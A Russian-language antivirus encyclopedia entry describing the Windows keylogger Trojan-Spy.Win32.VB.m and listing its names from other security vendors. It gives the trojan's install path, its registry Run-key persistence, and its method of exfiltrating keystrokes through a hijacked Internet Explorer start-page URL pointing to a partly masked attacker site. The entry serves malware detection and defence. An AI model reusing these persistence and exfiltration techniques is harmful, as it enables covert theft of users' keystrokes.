Троянская программа — клавиатурный шпион. Является приложением Windows (PE EXE-файл).
Инсталляция
После запуска троянец копирует свое тело в корневой каталог Windows под именем «SYSEDIT.EXE»:
%WinDir%\SYSEDIT.EXE
С целью автоматического запуска при каждом последующем старте системы троянец добавляет ссылку на свой исполняемый файл в ключ автозапуска системного реестра:
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run] "sysedit" = "%WinDir%\SYSEDIT.EXE"
Деструктивная активность
Троянская программа отслеживает нажатия клавиш клавиатуры. Для сохранения и отправки похищаемых данных злоумышленнику используется ключ системного реестра, отвечающий за стартовую страницу браузера Internet Explorer:
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = http://www.***sch.com/test/test.php?page=%current_start_page%&text=%log%
При загрузке браузера открывается сайт злоумышленника, затем происходит редирект на обычную стартовую страницу пользователя. При этом в качестве параметра «text» на сайт злоумышленника передается собранная информация о клавиатурном вводе. После успешной передачи данных лог обнуляется.
Другие названия
Trojan-Spy.Win32.VB.m («Лаборатория Касперского») также известен как: TrojanSpy.Win32.VB.m («Лаборатория Касперского»), PWS-RedNeck (McAfee), PWSteal.Trojan (Symantec), BackDoor.Frestr (Doctor Web), TrojanSpy:Win32/VB.M (RAV), TROJ_VB.M (Trend Micro), TR/SPY.VB.m (H+BEDV), Win32:Trojan-gen. (ALWIL), Trojan.Spy.VB.M (SOFTWIN), Backdoor Program (Panda), Win32/Spy.VB.M (Eset)